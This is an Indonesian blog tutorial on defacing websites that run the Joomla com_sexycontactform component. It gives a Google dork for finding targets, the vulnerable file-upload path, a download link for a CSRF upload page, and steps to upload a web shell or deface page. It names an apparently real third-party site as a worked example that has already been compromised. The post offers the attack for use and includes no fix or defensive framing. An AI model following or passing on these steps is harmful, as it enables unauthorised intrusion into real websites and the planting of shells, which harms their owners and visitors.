Cara Deface Dengan COM SEXY Menggunakan CSRF COM SEXY

Kang Karding - Cara Deface Dengan COM SEXY Menggunakan CSRF COM SEXY

• Alat Deface :
  
  • Google Dork : inurl:"/components/com_sexycontactform/"site;pl dan kembangin sendiri,
  • Exploit : /components/com_sexycontactform/fileupload/index.php
    Ex : target.com/[path]/components/com_sexycontactform/fileupload/index.php
  • CSRF nya bisa download disini : 4shared atau Pastebin 
   
•  Yang pertama, ngedork dulu. kalo udah dapet target masukin xploit nya. Ex : http://www.gretm.fr/components/com_sexycontactform/fileupload/index.php
  ciri-ciri vuln kek gini
  
  
   
• Kalo udah dapet yang vuln, edit link yang ada di CSRF nya dengan site ente.
  
  
   
• Terus buka csrf nya, Upload shell/script deface
   
   
• Yeahh? kok gini?
  ini tandanya berhasil di upload :)
  
  
   
• Buat load file yang udah di upload tadi di target.com/[path]/components/com_sexycontactform/fileupload/files/file_ente.php ex : http://www.gretm.fr/components/com_sexycontactform/fileupload/files/mimin.htm 
  
  
  Oke, sekian dulu tutorial hari ini, semoga bisa membantu. Terimakasih ^_^
• Semoga Bermanfaat

Share :

You may like these posts :

• 
  Cara Mencari file Uploader di Website
• 
  7 Situs Belajar Hacking
• 
  Scan Celah SSL pada Website Menggunakan A2SV | Auto Scanning to SSL Vulnerability
• 
  Cara Melihat Nomer Telkom Speedy Modem ZTE F660 & ZTE F609 melalui Admin Browser